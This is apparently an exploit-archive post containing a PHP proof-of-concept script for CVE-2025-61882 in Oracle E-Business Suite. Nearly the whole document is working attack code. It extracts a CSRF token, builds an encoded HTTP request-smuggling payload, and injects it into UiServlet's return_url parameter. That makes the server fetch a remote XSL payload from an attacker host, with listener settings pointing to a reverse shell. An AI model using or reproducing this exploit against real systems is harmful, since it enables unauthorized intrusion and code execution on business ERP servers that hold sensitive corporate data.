Oracle E-Business Suite 12.2.3 Request Smuggling

=============================================================================================================================================
| # Title Oracle E-Business Suite 12.2.3 Request Smuggling

=============================================================================================================================================
| # Title : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.oracle.com/applications/ebusiness/ |
=============================================================================================================================================

[+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882

[+] Summary: This script is a refined proof-of-concept targeting Oracle E?Business Suite (EBS) vulnerability CVE?2025?61882.
It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization.
The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body.
Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure.
The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research.

[+] POC : php poc.php

<?php

class OracleEBSCVE202561882Exploit {
private $target;
private $targetPort = 8000;
private $srvHost;
private $srvPort;
private $lhost;
private $lport;
private $verbose = false;
private $cookies = [];
private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
private $useHttps = false;

public function __construct($options) {
$this->target = $options['target'] ?? null;
$this->lhost = $options['lhost'] ?? null;
$this->lport = $options['lport'] ?? null;
$this->srvHost = $options['srvHost'] ?? '127.0.0.1';
$this->srvPort = $options['srvPort'] ?? 8080;
$this->verbose = $options['verbose'] ?? false;

if ($this->target) {
$parsed = parse_url($this->target);
if ($parsed !== false) {
$scheme = $parsed['scheme'] ?? 'http';
$this->useHttps = ($scheme === 'https');
$this->target = $parsed['host'] ?? $this->target;
$this->targetPort = $parsed['port'] ?? ($this->useHttps ? 443 : 80);
}
}
}

private function retrieveCsrfTokenImproved() {
$url = $this->buildUrl('/OA_HTML/JavaScriptServlet');
$headers = [
'CSRF-XHR: YES',
'FETCH-CSRF-TOKEN: 1',
'X-Requested-With: XMLHttpRequest'
];

$response = $this->httpRequest('POST', $url, '', $headers, true);

if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\s*([a-zA-Z0-9\-]+)/i', $response, $m)) {
return trim($m[1]);
}

if (preg_match('/"csrfToken"\s*:\s*"([^"]+)"/', $response, $m)) {
return $m[1];
}

return false;
}

private function createSmugglePayloadImproved($xslUrl) {
$parsedXsl = parse_url($xslUrl);
$xslHost = $parsedXsl['host'] ?? $this->srvHost;
$xslPath = $parsedXsl['path'] ?? '/payload.xsl';
$smuggled = "GET {$xslPath} HTTP/1.1\r\n";
$smuggled .= "Host: {$xslHost}\r\n";
$smuggled .= "User-Agent: Oracle-Internal/1.0\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";
$payload = "0\r\n\r\n";
$payload .= $smuggled;

return $this->encodeSmugglePayload($payload);
}

private function encodeSmugglePayload($payload) {
$encoded = '';
$len = strlen($payload);
for ($i = 0; $i < $len; $i++) {
$c = $payload[$i];
if ($c === "\r" || $c === "\n") {
$encoded .= $c;
} else {
$encoded .= '&#' . ord($c) . ';';
}
}
return $encoded;
}

public function exploit() {
$this->log("Attempting to retrieve CSRF token...", "info");
$token = $this->retrieveCsrfTokenImproved();

if (!$token) {
$this->log("Failed to retrieve CSRF token, smuggling may be unreliable.", "warning");
}

$xslUrl = "http://{$this->srvHost}:{$this->srvPort}/payload.xsl";
$smuggleData = $this->createSmugglePayloadImproved($xslUrl);
$xml = "<?xml version='1.0' encoding='UTF-8'?>";
$xml .= "<initialize>";
$xml .= "<param name='return_url'>http://internal.ebs.local{$smuggleData}</param>";
$xml .= "<param name='ui_type'>Applet</param>";
$xml .= "</initialize>";

$url = $this->buildUrl('/OA_HTML/configurator/UiServlet');
$postData = http_build_query([
'redirectFromJsp' => '1',
'getUiType' => $xml,
'oa_csrf_token' => $token
]);

$this->log("Sending smuggling payload to UiServlet...", "info");
$this->httpRequest('POST', $url, $postData, [
'Content-Type: application/x-www-form-urlencoded'
]);

$this->log("Payload sent. Monitor your HTTP server and listener.", "success");
}

private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_CUSTOMREQUEST => $method,
CURLOPT_HEADER => $returnFull,
CURLOPT_HTTPHEADER => array_merge(
["User-Agent: {$this->userAgent}"],
$headers
)
]);

if ($method === 'POST') {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}

$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function buildUrl($path) {
$scheme = $this->useHttps ? 'https' : 'http';
return "{$scheme}://{$this->target}:{$this->targetPort}{$path}";
}

private function log($msg, $type) {
echo "[{$type}] {$msg}\n";
}
}

$options = [
'target' => 'http://192.168.1.100:8000',
'lhost' => '192.168.1.50',
'lport' => 4444,
'srvHost' => '192.168.1.50',
'srvPort' => 8080
];

$exploit = new OracleEBSCVE202561882Exploit($options);
$exploit->exploit();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================